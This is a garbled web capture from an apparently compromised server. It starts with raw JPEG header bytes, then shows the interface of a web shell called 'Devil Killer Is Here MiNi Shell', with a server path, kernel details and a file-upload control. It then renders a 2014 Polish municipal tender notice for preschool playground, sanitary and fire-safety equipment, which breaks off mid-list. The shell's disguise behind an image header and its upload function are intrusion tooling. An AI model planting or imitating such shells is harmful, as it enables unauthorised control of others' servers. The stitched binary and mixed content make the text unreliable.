JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140512/159422-N-2014.html

<p class="kh_header"><b>Kamień: Doposażenie bazy dydaktycznej placówek oświatowych w ramach realizacji projektu systemowego pt. Modernizacja oddziałów przedszkolnych w szkołach podstawowych.</b><br>
<b>Numer ogłoszenia: 159422 - 2014; data zamieszczenia: 12.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kamień , ul. Diamentowa 15, 22-113 Kamień, woj. lubelskie, tel. 82 5671551, faks 82 5671571.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugkamien.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie bazy dydaktycznej placówek oświatowych w ramach realizacji projektu systemowego pt. Modernizacja oddziałów przedszkolnych w szkołach podstawowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest doposażenie bazy dydaktycznej oddziałów przedszkolnych szkół podstawowych na ternie Gminy Kamień.  Szkoły objęte wsparciem to: Szkoła Podstawowa w Kamieniu i Szkoła  Podstawowa w Strachosławiu wchodząca  w skład Zespołu Szkół w Strachosławiu.  Doposażenie bazy dydaktyczne oddziałów przedszkolnych szkół dotyczy zakup i dostawy  materiałów bhp, urządzeń sanitarnych, placu zabaw  wraz z wszelkimi kosztami, jakie poniesie Wykonawca z tytułu należytej realizacji przedmiotu zamówienia, a w szczególności z kosztami dostarczenia, załadunku, rozładunku przedmiotu umowy, ubezpieczenia transportu przedmiotu umowy do czasu odbioru, gwarancją jakości na dostarczony towar. Każdy z powyższych elementów bazy dydaktycznej  stanowi oddzielną  część zamówienia.
Zgodnie z art. 30 ust. 4 ustawy Pzp  Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne  opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowany przez niego sprzęt spełniają wymagania określone  przez Zamawiającego art. 30 ust. 5 ustawy Pzp . Zamawiający informuje, że wszystkie podane i wpisane w zapytaniu znaki towarowe sprzętu, patenty lub pochodzenie, należy traktować jako przykładowe, które można zastąpić materiałami, produktami, urządzeniami, wyrobami równoważnymi. Przez równoważność należy rozumieć zastosowanie porównywalnych wyrobów , produktów innych marek producentów o parametrach technicznych i wymogach jakościowych niepowodujących pogorszenia właściwości  użytkowania i jakości sprzętu. Użyte znaki towarowe materiałów  i urządzeń należy traktować jako rozwiązania techniczne określające  standard określonego sprzętu. Nazwy i symbole handlowe zostały podane w celu jak najdokładniejszego określenia sprzętu, które mogą być użyte do realizacji przedmiotu zamówienia. Mogą one być zastąpione sprzętem o równoważnych lub lepszych parametrach technicznych, technologicznych i standardzie jakościowym.
4.1. Wykonawca zobowiązany jest podać w formie oświadczenia części zamówienia, które zamierza powierzyć podwykonawcom. Wykonawca odpowiada za działania i zaniechania ewentualnych podwykonawców jak za własne. Zamawiający nie dopuszcza możliwości powierzenia wykonania przedmiotu zamówienia w całości przez inny podmiot niż Wykonawca.
4.2. Zamówienie obejmuje zakup i dostawę materiałów bhp,  urządzeń sanitarnych, placu zabaw  wraz z wszelkimi kosztami  do każdego z niżej wymienionych rodzajów zajęć w poszczególnych szkołach i składa się z następujących części:
Część  Nr 1 zamówienia -Zakup  placu  zabaw do Oddziału Przedszkolnego w Szkole Podstawowej   w Kamieniu 
Część Nr 2 zamówienia -Zakup  placu  zabaw do Oddziału Przedszkolnego w Szkole Podstawowej w Strachosławiu 
Część Nr 3 zamówienia - Zakup urządzeń sanitarnych do Oddziału Przedszkolnego w Szkole  Podstawowej w Kamieniu
Część Nr 4 zamówienia - Zakup urządzeń sanitarnych do Oddziału Przedszkolnego w Szkole  Podstawowej w Strachosławiu
Część Nr 5 zamówienia - Zakup sprzętu BHP do Oddziału Przedszkolnego w Szkole Podstawowej w  Kamieniu
Część Nr 6 zamówienia  - Zakup sprzętu BHP do Oddziału Przedszkolnego w Szkole Podstawowej w  Strachosławiu.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 20% wartości zamówienia podstawowego zgodnie z art. 67 ust.1 pkt. 7 PZP, polegającego na rozszerzeniu dostawy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.52.40-1, 37.53.52.30-8, 44.41.10.00-4, 35.11.13.20-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany umowy w zakresie :
1) terminu końcowego wykonania przedmiotu umowy w przypadku:
a) wystąpienia okoliczności niezależnych od Wykonawcy i na uzasadniony wniosek Wykonawcy pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona;
b) działania siły wyższej;
2) polepszenia parametrów technicznych dostawy sprzętu komputerowego z uwagi na postęp technologiczny
3) przedłużenia okresu gwarancji lub poprawienia jej warunków;
4) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
5) ze względu na dofinansowane zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie.
2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany i może być dopuszczalna tylko w granicach unormowania art. 144 ustawy Prawo Zamówień Publicznych. 
3. Niedopuszczalna jest jednak zmiana postanowień zawartej umowy oraz wprowadzenia nowych postanowień do umowy niekorzystnych dla zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie, której dokonano wyboru wykonawcy, chyba , że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
Zamawiającemu przysługuje prawo odstąpienia od Umowy w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia Umowy, przy czym przedmiotowe odstąpienie może nastąpić w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www..kamien.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Urzędzie Gminy Kamień, Kamień ul. Diamentowa 15, 22-113 w godz. pracy Urzędu tj. codziennie 7:10 - 15:00 , wtorek 8:00 - 16:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2014 godzina 11:00, miejsce: Urząd Gminy Kamień, Kamień ul. Diamentowa 15, 22-113 ,  Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Modernizacja oddziałów przedszkolnych w szkołach podstawowych w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część  Nr 1 zamówienia -Zakup  placu  zabaw do Oddziału Przedszkolnego w Szkole Podstawowej   w Kamieniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia  
Lp.	Artykuły	Ilość sztuk/zestawów
1	Zewnętrzny kosz na śmieci ze stali o pojemności 70 litrów obłożony impregnowanymi deskami, szerokość 40 cm, wysokość 80 cm.	1	
2	Zestaw z montażem:  wieża/dach dwuspadowy( x2) mostek łukowy, podest łączący z poręczami, schody wejściowe, drabina wejściowa, tunel, zjeżdżalnia (x 2) z kotwami. Wymiary zestawu:5,5mx4,8mx3,4m (dł. x szer. x wys.).Bezpieczna strefa użytkowania:8,8m x 9,5m.	1	
3	Bujak na sprężynie - konik (z montażem do podłoża). Wymiary : dł. 100 x szer.30 cm xwys.90 cm. Wykonany ze sklejki wodoodpornej z filmem syntetycznym. Sprężyna 20x40 cm	1	
4	Piaskownica drewniana, kwadratowa, impregnowana, drewno sosnowe z 4 deskami służącymi jako siedzisko. Szerokość : 120 cm, 
Długość : 120 cm, 
Wysokość : 20 cm	1	
5	Pokrywa na piaskownicę o wymiarach 120x120 cm składająca się z trzech części z drewna sosnowego.	1	
6	Podwójna huśtawka (z montażem do podłoża) . Wymiary dł.380x150x220cm	1	
7	Karuzela tarczowa z siedzeniami, mocowana do podłoża bezpośrednio w gruncie. Tarcza wykonana z blachy ryflowanej.
Wysokość 80 cm
Szerokość 150 cm	1	
8	Wykonanie bezpiecznej nawierzchni placu zabaw 38 m2. Nawierzchnia poliuretanowa o grubości minimum 40 mm. Kolory czerwony, żółty i niebieski.	38 m2	
2) Wspólny Słownik Zamówień (CPV): 37535200-9, 37535240-1, 37535230-8
3) Czas trwania lub termin wykonania: Zakończenie:27.06.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.52.40-1, 37.53.52.30-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część Nr 2 zamówienia -Zakup  placu  zabaw do Oddziału Przedszkolnego w Szkole Podstawowej w Strachosławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krótki opis ze wskazaniem wielkości lub zakresu zamówienia  
Lp.	Artykuły	Ilość sztuk/zestawów
1	Ławka z bali z oparciem (z montażem do podłoża) wymiary:1,80x0,51x0,85 cm	4	
2	Zewnętrzny kosz na śmieci ze stali o pojemności 70 litrów obłożony impregnowanymi deskami, szerokość 40 cm, wysokość 80 cm.	1	
3	Zestaw z montażem:  wieża/dach dwuspadowy( x2) mostek łukowy, podest łączący z poręczami, schody wejściowe, drabina wejściowa, tunel, zjeżdżalnia (x 2) z kotwami. Wymiary zestawu:5,5mx4,8mx3,4m (dł. x szer. x wys.).Bezpieczna strefa użytkowania:8,8m x 9,5m.	1	
4	Bujak na sprężynie - konik (z montażem do podłoża). Wymiary : dł. 100 x szer.30 cm xwys.90 cm. Wykonany ze sklejki wodoodpornej z filmem syntetycznym. Sprężyna 20x40 cm	1	
5	Piaskownica drewniana, kwadratowa, impregnowana, drewno sosnowe z 4 deskami służącymi jako siedzisko. Szerokość : 120 cm, 
Długość : 120 cm, 
Wysokość : 20 cm	1	
6	Pokrywa na piaskownicę o wymiarach 120x120 cm składająca się z trzech części z drewna sosnowego.	1	
7	Podwójna huśtawka z montażem do podłoża . Wymiary dł.380x150x220cm	1	
8	Karuzela tarczowa z siedzeniami, mocowana do podłoża bezpośrednio w gruncie. Tarcza wykonana z blachy ryflowanej.
Wysokość 80 cm
Szerokość 150 cm	1	
9	Drewniany, impregnowany płotek przeplatany. 
Wysokość 80 cm	50 mb	
2) Wspólny Słownik Zamówień (CPV): 37535200-9, 37535240-1, 37535230-8
3) Czas trwania lub termin wykonania: Zakończenie: 27.06.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.52.40-1, 37.53.52.30-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część Nr 3 zamówienia - Zakup urządzeń sanitarnych do Oddziału Przedszkolnego w Szkole  Podstawowej w Kamieniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krótki opis ze wskazaniem wielkości lub zakresu zamówienia  
L.p	Nazwa + krótki opis produktu	Ilość
1	Dwustopniowy podest  do toalety i umywalki z powierzchniami antypoślizgowymi. Kolor zielony.
Wymiary: 37x34x18 cm. Wysokość każdego stopnia: ok. 9 cm. 	1	
2	Półki na kubeczki i ręczniki. Wykonane z  zielonego MDF-u. Zestaw na 15 kubków.	2	
3	Pleksi lustro XT. Akrylowa płyta ekstrudowana, powleczona warstwą lustrzaną w srebrnym kolorze.  
Wysokość : 50 cm
Szerokość :80 cm	2	
4	Plastikowy  dozownik do mydła w płynie. 
Pojemność: 1 litr
Materiał obudowy: tworzywo ABS
Kolor obudowy: biała obudowa
Wymiary: - wysokość: 225 mm, - szerokość: 155 mm, - głębokość: 135 mm
Wizjer do kontroli poziomu mydła
Rodzaj montażu: naścienny, przykręcany
Zawór niekapek	1	
5	Plastikowy dozownik ręczników w listkach.
Materiał obudowy: tworzywo ABS
Kolor obudowy: biało-szary
Wymiary: - wysokość: 270 mm, - szerokość: 270 mm, - głębokość: 130 mm
Sposób dozowania: wyciągnięcie jednej sztuki papieru powoduje wysunięcie się kolejnej
Okienko kontrolne informujące o ilości ręczników
Rodzaj montażu: naścienny, przykręcany	2
2) Wspólny Słownik Zamówień (CPV): 44411000-4;
3) Czas trwania lub termin wykonania: Zakończenie:27.06.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część Nr 4 zamówienia - Zakup urządzeń sanitarnych do Oddziału Przedszkolnego w Szkole  Podstawowej w Strachosławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krótki opis ze wskazaniem wielkości lub zakresu zamówienia  
L.p	Nazwa + krótki opis produktu	Ilość
1	Dwustopniowy podest  do toalety i umywalki z powierzchniami antypoślizgowymi. Kolor zielony.
Wymiary: 37x34x18 cm. Wysokość każdego stopnia: ok. 9 cm. 	1	
2	Półki na kubeczki i ręczniki. Wykonane z  zielonego MDF-u. Zestaw na 15 kubków.	2	
3	Pleksi lustro XT. Akrylowa płyta ekstrudowana, powleczona warstwą lustrzaną w srebrnym kolorze.  
Wysokość : 50 cm
Szerokość :80 cm	2	
4	Plastikowy  dozownik do mydła w płynie. 
Pojemność: 1 litr
Materiał obudowy: tworzywo ABS
Kolor obudowy: biała obudowa
Wymiary: - wysokość: 225 mm, - szerokość: 155 mm, - głębokość: 135 mm
Wizjer do kontroli poziomu mydła
Rodzaj montażu: naścienny, przykręcany
Zawór niekapek	1	
5		Plastikowy dozownik ręczników w listkach.
Materiał obudowy: tworzywo ABS
Kolor obudowy: biało-szary
Wymiary: - wysokość: 270 mm, - szerokość: 270 mm, - głębokość: 130 mm
Sposób dozowania: wyciągnięcie jednej sztuki papieru powoduje wysunięcie się kolejnej
Okienko kontrolne informujące o ilości ręczników
Rodzaj montażu: naścienny, przykręcany	2

2) Wspólny Słownik Zamówień (CPV): 44411000;
3) Czas trwania lub termin wykonania: Zakończenie:27.06.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część Nr 5 zamówienia - Zakup sprzętu BHP do Oddziału Przedszkolnego w Szkole Podstawowej w  Kamieniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krótki opis ze wskazaniem wielkości lub zakresu zamówienia  
Lp.	Nazwa i opis produktu	Ilość sztuk/zestawów
1	Gaśnica przeciwpożarowa proszkowa GP9xABC/E, 9kg środka gaśniczego, przeznaczona do gaszenia pożarów A, B, C, E. Dane techniczne:
Masa środka gaśniczego9 kg
Masa całkowita ok. 15 kg
